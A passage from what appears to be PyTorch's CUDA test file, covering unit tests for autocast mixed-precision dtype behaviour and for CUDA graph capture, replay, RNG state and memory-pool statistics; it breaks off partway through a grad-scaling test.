"autocast for torch.{} produced {}, should produce torch.{}"
.format(op, output_method.dtype, out_type))
self.assertTrue((output is not None) or (output_method is not None),
"{} not found as an attribute on either Tensor or the requested module {}".format(
op, module))
# Accounts for ops that return Tensors, iterables, and other non-Tensors.
# For example, lstm_cell returns a tuple and equal returns bool.
def compare(first, second):
if isinstance(first, torch.Tensor):
return torch.equal(first, second)
elif isinstance(first, collections.abc.Iterable):
return all(compare(f, s) for f, s in zip(first, second))
else:
return first == second
# If both torch.* and Tensor.* variants were found, check outputs are identical
if (output is not None) and (output_method is not None):
self.assertTrue(type(output) == type(output_method))
comparison = compare(output, output_method)
self.assertTrue(comparison, "torch.{0} result did not match Tensor.{0} result".format(op))
# Compare numerics to Python-side "autocasting" that (we expect) does the same thing
# as the C++-side autocasting, and should be bitwise accurate.
output_to_compare = output if output is not None else output_method
with torch.cuda.amp.autocast(enabled=False):
self.assertFalse(torch.is_autocast_enabled())
if module is not None and hasattr(module, op):
control = getattr(module, op)(*cast(args, run_as_type), **add_kwargs)
else:
control = getattr(args[0].to(run_as_type), op)(*cast(args[1:], run_as_type), **add_kwargs)
self.assertTrue(type(output_to_compare) == type(control))
comparison = compare(output_to_compare, control)
self.assertTrue(comparison, "torch.{} result did not match control".format(op))
self.assertTrue(torch.is_autocast_enabled())
self.assertFalse(torch.is_autocast_enabled())
def args_maybe_kwargs(self, op_with_args):
if len(op_with_args) == 2:
return op_with_args[0], op_with_args[1], {}
else:
return op_with_args[0], op_with_args[1], op_with_args[2]
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_torch_fp16(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
for op_with_args in self.autocast_lists.torch_fp16:
skip_test = False
op, args = op_with_args[0], op_with_args[1]
if len(op_with_args) == 3:
skip_test = op_with_args[2] # TEST_WITH_ROCM
if not skip_test:
self._run_autocast_outofplace(op, args, torch.float16)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_torch_fp32(self):
for op_with_args in self.autocast_lists.torch_fp32:
op, args, maybe_kwargs = self.args_maybe_kwargs(op_with_args)
self._run_autocast_outofplace(op, args, torch.float32, add_kwargs=maybe_kwargs)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_torch_need_autocast_promote(self):
for op, args in self.autocast_lists.torch_need_autocast_promote:
self._run_autocast_outofplace(op, args, torch.float32)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_torch_expect_builtin_promote(self):
for op, args, out_type in self.autocast_lists.torch_expect_builtin_promote:
self._run_autocast_outofplace(op, args, torch.float32, out_type=out_type)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_nn_fp16(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
for op, args in self.autocast_lists.nn_fp16:
self._run_autocast_outofplace(op, args, torch.float16, module=torch._C._nn)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_nn_fp32(self):
for op, args in self.autocast_lists.nn_fp32:
self._run_autocast_outofplace(op, args, torch.float32, module=torch._C._nn)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_linalg_fp16(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
for op, args in self.autocast_lists.linalg_fp16:
self._run_autocast_outofplace(op, args, torch.float16, module=torch._C._linalg)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_methods_fp16(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
for op, args in self.autocast_lists.methods_fp16:
self._run_autocast_outofplace(op, args, torch.float16, module=None)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_methods_fp32(self):
for op, args in self.autocast_lists.methods_fp32:
self._run_autocast_outofplace(op, args, torch.float32, module=None)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_methods_expect_builtin_promote(self):
for op, args, out_type in self.autocast_lists.methods_expect_builtin_promote:
self._run_autocast_outofplace(op, args, torch.float32, module=None, out_type=out_type)
def test_autocast_banned(self):
with torch.cuda.amp.autocast():
for op, args, module in self.autocast_lists.banned:
with self.assertRaises(RuntimeError):
getattr(module, op)(*args)
def test_autocast_ignored_types(self):
with torch.cuda.amp.autocast():
for ignore_type in (torch.double, torch.int32):
a_ignore = torch.ones((8, 8), dtype=ignore_type, device="cuda:0")
b_ignore = torch.ones((8, 8), dtype=ignore_type, device="cuda:0")
c_16 = torch.ones((8, 8), dtype=torch.float16, device="cuda:0")
# Tests if CastPolicy::fp16 ops ignore double and int
# Currently, no ops belonging to this policy support integer inputs.
if ignore_type is torch.double:
with self.assertRaises(RuntimeError):
torch.mm(a_ignore, c_16)
with torch.cuda.amp.autocast(enabled=False):
type_no_autocast = torch.mm(a_ignore, b_ignore).dtype
self.assertTrue(torch.mm(a_ignore, b_ignore).dtype is type_no_autocast)
# Tests if CastPolicy::fp32 ops ignore double and int
with torch.cuda.amp.autocast(enabled=False):
type_no_autocast = torch.pow(a_ignore, 2.0).dtype
self.assertTrue(torch.pow(a_ignore, 2.0).dtype is type_no_autocast)
# Tests if CastPolicy::fp32_set_opt_dtype ops ignore double and int
with torch.cuda.amp.autocast(enabled=False):
type_no_autocast = torch.sum(a_ignore).dtype
self.assertTrue(torch.sum(a_ignore).dtype is type_no_autocast)
# Tests if CastPolicy::fp32_append_dtype ops ignore double and int
# Currently, no ops belonging to this policy support integer inputs.
if ignore_type is torch.double:
with torch.cuda.amp.autocast(enabled=False):
type_no_autocast = torch.norm(a_ignore).dtype
self.assertTrue(torch.norm(a_ignore).dtype is type_no_autocast)
def test_autocast_custom_enabled(self):
class MyMM(torch.autograd.Function):
@staticmethod
@torch.cuda.amp.custom_fwd
def forward(ctx, a, b):
self.assertTrue(a.dtype is torch.float32)
self.assertTrue(b.dtype is torch.float32)
self.assertTrue(torch.is_autocast_enabled())
ctx.save_for_backward(a, b)
return a.mm(b)
@staticmethod
@torch.cuda.amp.custom_bwd
def backward(ctx, grad):
self.assertTrue(torch.is_autocast_enabled())
a, b = ctx.saved_tensors
return grad.mm(b.t()), a.t().mm(grad)
mymm = MyMM.apply
x = torch.randn((8, 8), device="cuda", dtype=torch.float32, requires_grad=True)
y = torch.randn((8, 8), device="cuda", dtype=torch.float32, requires_grad=True)
with torch.cuda.amp.autocast():
output = mymm(x, y)
self.assertTrue(output.dtype is torch.float16)
loss = output.sum()
loss.backward()
def test_autocast_custom_cast_inputs(self):
class MyMM(torch.autograd.Function):
@staticmethod
@torch.cuda.amp.custom_fwd(cast_inputs=torch.float32)
def forward(ctx, a, container, expect_type):
b = container[1][0]
self.assertTrue(a.dtype is expect_type)
self.assertTrue(b.dtype is expect_type)
self.assertFalse(torch.is_autocast_enabled())
ctx.save_for_backward(a, b)
return a.mm(b)
@staticmethod
@torch.cuda.amp.custom_bwd
def backward(ctx, grad):
self.assertFalse(torch.is_autocast_enabled())
a, b = ctx.saved_tensors
return grad.mm(b.t()), None, None
mymm = MyMM.apply
x = torch.randn((8, 8), device="cuda", dtype=torch.float16, requires_grad=True)
# Puts one input tensor in a nested container. y's contained Tensor won't receive a gradient,
# because torch.autograd.Function can't hand gradients back to non-Tensor forward arguments.
# Sets requires_grad=False explicitly so we don't lie about expecting a gradient.
y = (0, {0: torch.randn((8, 8), device="cuda", dtype=torch.float16, requires_grad=False)})
with torch.cuda.amp.autocast():
output = mymm(x, y, torch.float32)
self.assertTrue(output.dtype is torch.float32)
loss = output.sum()
loss.backward()
# Tests if custom_fwd becomes a no-op when mymm runs outside an autocast-enabled region.
output = mymm(x, y, torch.float16)
self.assertTrue(output.dtype is torch.float16)
loss = output.sum()
loss.backward()
def test_autocast_cat_jit(self):
# Reported at https://github.com/pytorch/pytorch/issues/38958
class Model(torch.nn.Module):
def forward(self):
a = torch.randn(1)
b = torch.randn(1)
c = torch.cat((a, b), 0)
d = torch.stack([c, c], 0)
return d
# The JIT here doesn't really matter; we just need to call
# cat via the boxed API
model = Model()
model_jit_script = torch.jit.script(model)
with torch.cuda.amp.autocast(True):
model()
model_jit_script()
# cudnn RNNs require special backend handling (weights are cast to FP16 and reflattened)
# so they get a dedicated test.
# Despite the large number of RNN cases it tries, the test takes < 15 seconds on a Titan V (similar to V100).
@skipIfRocm
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_rnn(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
# seq, batch, features, hidden size
clses = ("RNN", "GRU", "LSTM")
T, B, F, H = 3, 4, 5, 6
dtypes = (torch.float16, torch.float32)
input_layouts = ("seq_first", "batch_first", "packed")
for (cls, num_layers, bias, input_layout, bidirectional, try_nonpreflattened_weights,
input_dtype, hidden_dtype, weight_dtype) in \
product(clses, (1, 2), (True, False), input_layouts, (True, False), (True, False),
dtypes, dtypes, dtypes):
if input_layout == "seq_first":
batch_first = False
x = torch.randn((T, B, F), device="cuda", dtype=input_dtype)
elif input_layout == "batch_first":
batch_first = True
x = torch.randn((B, T, F), device="cuda", dtype=input_dtype)
elif input_layout == "packed":
batch_first = False
x = torch.randn((T, B, F), device="cuda", dtype=input_dtype)
x = torch.nn.utils.rnn.pack_padded_sequence(torch.randn((T, B, F),
device="cuda", dtype=input_dtype),
lengths=(3, 2, 1, 3),
enforce_sorted=False)
rnn = getattr(torch.nn, cls)(F, H, num_layers=num_layers, bidirectional=bidirectional,
bias=bias, batch_first=batch_first).cuda().to(dtype=weight_dtype)
if try_nonpreflattened_weights:
for p in rnn.parameters():
with torch.no_grad():
p.set_(p.clone())
h = torch.randn((num_layers * (2 if bidirectional else 1), B, H),
device="cuda", dtype=hidden_dtype)
if cls == "LSTM":
c = torch.randn((num_layers * (2 if bidirectional else 1), B, H),
device="cuda", dtype=hidden_dtype)
h = (h, c)
with torch.cuda.amp.autocast():
out, h_out = rnn(x, h)
out = out.data if input_layout == "packed" else out
self.assertEqual(out.dtype, torch.float16)
# Autocast wrapper requires at::_cudnn_rnn is autograd-exposed. This check can't guarantee
# at::_cudnn_rnn is autograd-exposed, but if it fires, it indicates some funny business has
# occurred and we should double check that at::_cudnn_rnn remains autograd-exposed.
self.assertEqual(out.grad_fn.name(), "CudnnRnnBackward")
out.sum().backward()
grads = [p.grad.clone() for p in rnn.parameters()]
rnn.zero_grad()
if cls == "LSTM":
out_control, h_out_control = rnn.to(dtype=torch.float16)(x.half(), (h[0].half(), h[1].half()))
else:
out_control, h_out_control = rnn.to(dtype=torch.float16)(x.half(), h.half())
out_control = out_control.data if input_layout == "packed" else out_control
out_control.sum().backward()
grads_control = [p.grad.clone() for p in rnn.parameters()]
# Compares with default tolerances, even for FP16 execution. Barring nondeterminism,
# autocast and control results should be bitwise identical.
self.assertEqual(out, out_control)
if cls == "LSTM":
self.assertTrue(h_out[0].dtype is torch.float16 and h_out[1].dtype is torch.float16)
self.assertEqual(h_out[0], h_out_control[0])
self.assertEqual(h_out[1], h_out_control[1])
else:
self.assertEqual(h_out.dtype, torch.float16)
self.assertEqual(h_out, h_out_control)
for grad, grad_control in zip(grads, grads_control):
self.assertEqual(grad.half(), grad_control)
def test_autocast_cache_leak(self):
# Reported at https://github.com/pytorch/pytorch/issues/48049
# Checks that autocast does not keep re-caching casts of the same parameters
# (leaking memory) when executed inside a `torch.no_grad()` block.
linear = torch.nn.Linear(10, 10).to('cuda')
data = torch.randn(1, 10, device='cuda')
with torch.cuda.amp.autocast():
with torch.no_grad():
out = linear(data)
first_iter_mem = torch.cuda.memory_allocated()
for _ in range(3):
out = linear(data)
self.assertTrue(first_iter_mem == torch.cuda.memory_allocated())
def test_autocast_checkpointing(self):
model = torch.nn.Sequential(torch.nn.Linear(8, 8),
torch.nn.Linear(8, 8),
torch.nn.Linear(8, 8)).cuda()
input = torch.rand((8, 8), device="cuda", dtype=torch.float16, requires_grad=True)
with torch.cuda.amp.autocast():
output = checkpoint_sequential(model, 2, input)
self.assertTrue(output.requires_grad)
self.assertTrue(output.dtype is torch.float16)
output.sum().backward()
@slowTest
@unittest.skipIf(not TEST_LARGE_TENSOR, "not enough memory")
def test_max_large_axis(self):
x = torch.zeros(2**32, device='cuda', dtype=torch.int8)
x[-1] = 1
val, idx = x.max(0)
self.assertEqual(val, 1)
self.assertEqual(idx, x.shape[0] - 1)
@unittest.skipIf(not TEST_NUMPY, "Numpy not found")
def test_to_numpy(self):
self.assertRaises(TypeError, lambda: torch.empty(1, device="cuda").numpy())
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_capture_simple(self):
s = torch.cuda.Stream()
with torch.cuda.stream(s):
a = torch.full((1000,), 1, device="cuda")
g = torch.cuda._Graph()
torch.cuda.empty_cache()
g.capture_begin()
b = a
for _ in range(10):
b = b + 1
g.capture_end()
torch.cuda.current_stream().wait_stream(s)
g.replay()
self.assertTrue(b.sum().item() == 11000.)
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_rng_functional(self):
ops_with_kwargs = ((torch.nn.functional.dropout, {"p": 0.1}),
(torch.nn.functional.rrelu, {"training": True}),)
size = 10000
def run(op, kwargs):
a = torch.randn((size,), device="cuda", dtype=torch.float)
# Control
torch.cuda.manual_seed(5)
eager_out = a
for _ in range(6):
eager_out = op(eager_out, **kwargs)
graph_in = a.clone()
stream = torch.cuda.Stream()
stream.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(stream):
torch.cuda.manual_seed(5)
g = torch.cuda._Graph()
torch.cuda.empty_cache()
g.capture_begin()
graph_out = graph_in
for _ in range(2):
graph_out = op(graph_out, **kwargs)
g.capture_end()
torch.cuda.current_stream().wait_stream(stream)
# Runs a graphed->eager->graphed sequence of RNG ops.
# replay() plays 2 invocations of the op, so the sequence has 6
# invocations total, matching Control.
# replay() reads from graph_in and writes to graph_out.
g.replay()
out = op(graph_out, **kwargs)
out = op(out, **kwargs)
graph_in.copy_(out)
g.replay()
# If replay() updated RNG state correctly, graph_out
# should now hold data equal to eager_out.
try:
self.assertEqual(eager_out, graph_out)
except Exception as e:
raise RuntimeError("Failed on ", op) from e
# We hold references to all tensors used across streams up til this sync,
# so no need to call record_stream on those tensors.
torch.cuda.synchronize()
for op, kwargs in ops_with_kwargs:
run(op, kwargs)
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_rng_distributions(self):
size = 10000
input = torch.rand((size,), device="cuda", dtype=torch.float)
alloc = torch.empty((size,), device="cuda", dtype=torch.float)
# Torch ops to test with sample args (tuple) and kwargs (dict)
torch_with_args = (("bernoulli", (input.clone(),), {}),
# multinomial uses some uncapturable CUDA calls.
# TODO: reenable multinomial tests if/when the implementation is capturable.
# ("multinomial", (input.clone(), size, True), {}),
# ("multinomial", (input.clone(), size // 2, False), {}),
# TODO: reenable normal test, where std is a device
# tensor, when graph test failures are fixed
# ("normal", (input.clone() + 1, input.clone()), {}),
("normal", (input.clone() + 1, 1.0), {}),
("poisson", (input.clone(),), {}),
("rand", (size,), {"device": "cuda", "dtype": torch.float}),
("randint", (0, 3, (size,)), {"device": "cuda", "dtype": torch.float}),
("randn", (size,), {"device": "cuda", "dtype": torch.float}),)
# Tensor methods to test with sample args (tuple)
tensor_with_args = (("bernoulli_", (input.clone(),)),
("cauchy_", ()),
("exponential_", ()),
("geometric_", (0.3,)),
("log_normal_", ()),
("normal_", ()),
("random_", ()),
("uniform_", ()),)
def run(module, op, args, kwargs):
torch.cuda.manual_seed(5)
# Each path runs a dummy op to increment the state a bit before creating controls.
if (module == "torch"):
dummy = getattr(torch, op)(*args, **kwargs)
control1 = getattr(torch, op)(*args, **kwargs)
control2 = getattr(torch, op)(*args, **kwargs)
else:
dummy = alloc.clone()
control1 = alloc.clone()
control2 = alloc.clone()
getattr(dummy, op)(*args)
getattr(control1, op)(*args)
getattr(control2, op)(*args)
stream = torch.cuda.Stream()
stream.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(stream):
torch.cuda.manual_seed(5)
g = torch.cuda._Graph()
torch.cuda.empty_cache()
if (module == "torch"):
g.capture_begin()
t1 = getattr(torch, op)(*args, **kwargs)
t2 = getattr(torch, op)(*args, **kwargs)
g.capture_end()
else:
t1 = alloc.clone()
t2 = alloc.clone()
g.capture_begin()
getattr(t1, op)(*args)
getattr(t2, op)(*args)
g.capture_end()
torch.cuda.current_stream().wait_stream(stream)
try:
self.assertNotEqual(control1, t1)
self.assertNotEqual(control2, t2)
except Exception as e:
raise RuntimeError("Failed on " + module + "." + op) from e
# Runs a dummy op prelude, as for controls, to make sure replay()
# picks up the dummy op's state increment.
if module == "torch":
dummy = getattr(torch, op)(*args, **kwargs)
else:
dummy = alloc.clone()
getattr(dummy, op)(*args)
# Runs RNG ops that fill t1 and t2.
g.replay()
try:
self.assertEqual(control1, t1)
self.assertEqual(control2, t2)
except Exception as e:
raise RuntimeError("Failed on " + module + "." + op) from e
# We hold references to all tensors used across streams up til this sync,
# so no need to call record_stream on those tensors.
torch.cuda.synchronize()
for op_with_args in torch_with_args:
run("torch", *op_with_args)
for meth_with_args in tensor_with_args:
# Adds an empty dict for kwargs, which none of the Tensor methods use
run("Tensor", *(meth_with_args + ({},)))
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_two_successive(self):
torch.cuda.empty_cache()
size = 1000
kSmallBuffer = 2097152
def func_with_temps(t, val):
x = t.clone() + val
y = t.clone() + val
return x + y
s = torch.cuda.Stream()
for share_mem in ("Don't share", "via pool()", "via graph_pool_handle()"):
g0 = torch.cuda._Graph()
g1 = torch.cuda._Graph()
a = torch.ones((size,), device="cuda")
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
g0_args = (torch.cuda._graph_pool_handle(),) if share_mem == "via graph_pool_handle()" else ()
g0.capture_begin(*g0_args)
b = a.clone()
for _ in range(5):
b = func_with_temps(b, 1)
g0.capture_end()
g1_args = (g0.pool(),) if share_mem == "via pool()" else g0_args
g1.capture_begin(*g1_args)
for _ in range(5):
b = func_with_temps(b, 1)
g1.capture_end()
torch.cuda.current_stream().wait_stream(s)
# mixes unrelated eager ops with replays
c = a.clone()
for _ in range(2):
c = func_with_temps(c, 3)
g0.replay()
for _ in range(2):
c = func_with_temps(c, 3)
g1.replay()
for _ in range(2):
c = func_with_temps(c, 3)
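# func_with_temps(t, val) computes 2 * t + 2 * val elementwise. Starting from ones,
# 10 iterations with val=1 give 3070 per element (b), and 6 iterations with val=3
# give 442 per element (c): 1 -> 8 -> 22 -> 50 -> 106 -> 218 -> 442.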
self.assertEqual(b.sum().item(), size * 3070)
self.assertEqual(c.sum().item(), size * 442)
if share_mem != "Don't share":
self.assertEqual(reserved_no_sharing - torch.cuda.memory_stats()["reserved_bytes.all.current"],
kSmallBuffer)
else:
reserved_no_sharing = torch.cuda.memory_stats()["reserved_bytes.all.current"]
del a, b, c, g0, g1
# Tensors used across streams (a and b) were held until just now, so no need to call record_stream on them.
torch.cuda.synchronize()
torch.cuda.empty_cache()
@unittest.skip("Temporarily disabled due to a graphs bug in libcuda.so, " +
"see https://github.com/pytorch/pytorch/pull/57556")
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_concurrent_replay(self):
torch.cuda.empty_cache()
size = 1000000 # largeish to help expose race conditions
def func_with_temps(t, val):
x = t.clone() + val
y = t.clone() + val
return x + y
s = torch.cuda.Stream()
for share_mem in ("Don't share", "via pool()", "via graph_pool_handle()"):
g0 = torch.cuda._Graph()
g1 = torch.cuda._Graph()
s0 = torch.cuda.Stream()
s1 = torch.cuda.Stream()
a = torch.ones((size,), device="cuda")
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
g0_args = (torch.cuda._graph_pool_handle(),) if share_mem == "via graph_pool_handle()" else ()
g0.capture_begin(*g0_args)
b = a.clone()
for _ in range(5):
b = func_with_temps(b, 1)
g0.capture_end()
g1_args = (g0.pool(),) if share_mem == "via pool()" else g0_args
g1.capture_begin(*g1_args)
c = a.clone()
for _ in range(5):
c = func_with_temps(c, 2)
g1.capture_end()
# To reproduce data corruption, I need g0 and g1's kernels to run concurrently.
# But replay() (especially cudaGraphLaunch) can incur significant CPU overhead.
# The following pattern helps align device-side execution of g0 and g1's kernels.
torch.cuda.synchronize()
with torch.cuda.stream(s0):
torch.cuda._sleep(1000000)
s1.wait_stream(s0)
g0.replay()
with torch.cuda.stream(s1):
g1.replay()
torch.cuda.current_stream().wait_stream(s0)
torch.cuda.current_stream().wait_stream(s1)
if share_mem != "Don't share":
# Confirms concurrent replays using the same mempool corrupted each other.
self.assertNotEqual(b.sum().item(), size * 94)
self.assertNotEqual(c.sum().item(), size * 156)
else:
# Confirms concurrent replays using different mempools did not corrupt each other.
self.assertEqual(b.sum().item(), size * 94)
self.assertEqual(c.sum().item(), size * 156)
del a, b, c, g0, g1
# Tensors used across streams (a, b, c) were held until just now, so no need to call record_stream on them.
torch.cuda.synchronize()
torch.cuda.empty_cache()
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_three_successive(self):
torch.cuda.empty_cache()
size = 1000
s = torch.cuda.Stream()
for share_mem in ("Don't share", "via pool()", "via graph_pool_handle()"):
a = torch.ones((size,), device="cuda")
g0 = torch.cuda._Graph()
g1 = torch.cuda._Graph()
g2 = torch.cuda._Graph()
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
g0_args = (torch.cuda._graph_pool_handle(),) if share_mem == "via graph_pool_handle()" else ()
g0.capture_begin(*g0_args)
b = a.clone()
c = b + 1
d = b + 2
g0.capture_end()
args = (g0.pool(),) if share_mem == "via pool()" else g0_args
g1.capture_begin(*args)
e = c + 3
del c
g1.capture_end()
g2.capture_begin(*args)
f = d + 4
g2.capture_end()
torch.cuda.current_stream().wait_stream(s)
# Tests that replaying in capture order is valid
g0.replay()
g1.replay()
g2.replay()
self.assertEqual(e.sum().item(), size * 5)
self.assertEqual(f.sum().item(), size * 7)
# Tests that replaying as g0, g2, g1 is only valid if they don't share a pool
g0.replay()
g2.replay()
g1.replay()
# If sharing is enabled (share_mem != "Don't share"), g2's capture should have reused c's memory for f.
# We replayed g2 then g1, so we expect g1's captured "e = c + 3" to have mistakenly filled e with "f's vals + 3".
self.assertEqual(e.sum().item(), size * (7 + 3) if share_mem != "Don't share" else size * 5)
self.assertEqual(f.sum().item(), size * 7)
del a, b, d, e, f, g0, g1, g2
# Tensors used across streams (a, e, f) were held until just now, so no need to call record_stream on them.
torch.cuda.synchronize()
torch.cuda.empty_cache()
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_memory_stats_and_use_result_after_destroy_graph(self):
kSmallSize = 1048576
kSmallBuffer = 2097152
kLargeBuffer = 20971520
kMinLargeAlloc = 10485760
kRoundLarge = 2097152
elem = 4
# this was annoying to write but stresses the expectations pretty rigorously
cases = ((512 // elem, 1, kSmallBuffer, kSmallBuffer, "small_pool"),
(kSmallSize // elem, 2, 2 * kSmallBuffer, kSmallBuffer, "small_pool"),
((kSmallSize + 512) // elem, 1, kLargeBuffer, kLargeBuffer, "large_pool"),
((kMinLargeAlloc - 512) // elem, 2, 2 * kLargeBuffer, kLargeBuffer, "large_pool"),
((kMinLargeAlloc + 512) // elem, 3,
3 * (kRoundLarge * ((kMinLargeAlloc + 512 + kRoundLarge - 1) // kRoundLarge)),
kRoundLarge * ((kMinLargeAlloc + 512 + kRoundLarge - 1) // kRoundLarge),
"large_pool"),)
stats_to_check = ("segment.",
"reserved_bytes.",
"active.",
"active_bytes.")
gc.collect()
torch.cuda.empty_cache()
s = torch.cuda.Stream()
for (numel,
delta_cudaMallocs,
delta_cudaMalloc_bytes,
delta_cudaMalloc_bytes_post_del_g,
pool_string) in cases:
if pool_string == "small_pool":
delta_active_blocks = 2 # one from "b" plus a sneaky one from CUDAGraph's one-element rng offset holder
delta_active_bytes = numel * elem + 512 # + 512 for CUDAGraph's rng offset holder
else:
delta_active_blocks = 1 # We only check the large pool, which isn't affected by rng offset holder
delta_active_bytes = numel * elem
g = torch.cuda._Graph()
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
# Allocation stat estimates assume input is created on the same stream as capture_begin()
# (in other words, the same stream silo as the rng offset holder, which is not allocated from the
# capture's private pool).
a = torch.ones((numel,), device="cuda")
precapture_stats = torch.cuda.memory_stats()
g.capture_begin()
b = a.clone()
for _ in range(5):
b = b.clone() + 1
g.capture_end()
torch.cuda.current_stream().wait_stream(s)
gc.collect()
postcapture_stats = torch.cuda.memory_stats()
expecteds = (delta_cudaMallocs,
delta_cudaMalloc_bytes,
delta_active_blocks,
delta_active_bytes)
# Double checks replay and stats before and after a call to empty_cache
for i in range(2):
for stat, expected in zip(stats_to_check, expecteds):
stat = stat + pool_string + ".current"
current = postcapture_stats[stat] - precapture_stats[stat]
self.assertEqual(current, expected, "Pre to post capture delta of " +
stat + " = {}, expected = {}, numel = {}".format(current, expected, numel))
g.replay()
self.assertEqual(b.sum().item(), 6 * numel)
if i == 0:
torch.cuda.empty_cache()
del g
gc.collect()
torch.cuda.empty_cache()
postdel_stats = torch.cuda.memory_stats()
# Uses graph result b after graph has been deleted
self.assertEqual(b.sum().item(), 6 * numel)
# b should be the only live reference remaining from the graph's private pool
expecteds = (1, delta_cudaMalloc_bytes_post_del_g, 1, numel * elem)
for stat, expected in zip(stats_to_check, expecteds):
stat = stat + pool_string + ".current"
current = postdel_stats[stat] - precapture_stats[stat]
self.assertEqual(current, expected, "Pre capture to post graph delete delta of " +
stat + " = {}, expected = {}, numel = {}".format(current, expected, numel))
# del a, b before the next case is essential, otherwise overwriting a and b in the next case
# can throw off its allocation/deallocation counts.
del a, b
# Tensors used across streams (a and b) were held until just now, so no need to call record_stream on them.
torch.cuda.synchronize()
torch.cuda.empty_cache()
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_record_stream(self):
# Makes sure graph capture defers attempting to reclaim allocations used across streams. See
# "Q. Why skip process_events if a capture might be underway?" in c10/cuda/CUDACachingAllocator.cpp
torch.cuda.empty_cache()
potential_problem = torch.zeros((3,), device="cuda")
a = torch.zeros((3,), device="cuda")
s0 = torch.cuda.Stream()
s1 = torch.cuda.Stream()
s2 = torch.cuda.Stream()
g = torch.cuda._Graph()
torch.cuda.synchronize()
with torch.cuda.stream(s0):
potential_problem.record_stream(s0)
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
potential_problem.fill_(1.)
del potential_problem
with torch.cuda.stream(s1):
g.capture_begin()
# potential_problem's allocation should still be outstanding. if DeviceCachingAllocator::malloc
# mistakenly calls process_events, it will trigger cudaEventQueries on potential_problem's end-of-life
# event, which will cause the capture to error.
b = a.clone()
# Let's also see what happens if we record_stream on a tensor during capture.
s2.wait_stream(s1)
with torch.cuda.stream(s2):
b.fill_(1.)
b.record_stream(s2) # dummy record_stream
del b
s1.wait_stream(s2)
g.capture_end()
torch.cuda.synchronize()
# A dummy allocation triggers process_events, hopefully processing b's end-of-life event successfully.
c = torch.zeros((3,), device="cuda")
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
# If this test is the first in the process to try cudnn rnns with dropout, it'll initialize
# DropoutState's long-lived internal buffer. Calling code perceives this (correct) behavior
# as a memory leak unless we skip the leak check.
@skipCUDAMemoryLeakCheckIf(True)
def test_graph_cudnn_dropout(self):
# Tests the interaction of cuda graph capture with DropoutState's syncs in ATen/native/cudnn/RNN.cpp.
# In particular, if user runs a sequence of captured and noncaptured cudnn rnns, DropoutState should
# avoid syncing noncapturing streams with captured events or vice versa.
torch.cuda.empty_cache()
model = torch.nn.LSTM(512, 512, 2, dropout=0.5).cuda()
x = torch.ones(100, 192, 512, device="cuda")
y = model(x)
g = torch.cuda._Graph()
s = torch.cuda.Stream()
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
g.capture_begin()
y = model(x)
g.capture_end()
torch.cuda.current_stream().wait_stream(s)
y = model(x)
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_grad_scaling(self):
torch.cuda.empty_cache()
scaler = torch.cuda.amp.GradScaler(init_scale=4.)
g = torch.cuda._Graph()
s = torch.cuda.Stream()
weight = torch.ones((100,), device="cuda", requires_grad=True)
opt = torch.optim.SGD([weight], lr=0.1)
static_input = torch.ones_like(weight)
static_grad = torch.ones_like(weight)
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
# warmup
loss = (weight.half() * static_input).sum()
scaler.scale(loss).backward()
opt.zero_grad(set_to_none=True)
# capture
g.capture_begin()
loss = (weight.half() * static_input).sum()
scaler.scale(loss).backward()
g.capture_end()
torch.cuda.current_stream().wait_stream(s)
input_vals = [5, 20000, 5, 40000]
# If the scale gets updated properly, these are the scale, growth tracker,
# and grad values we expect.
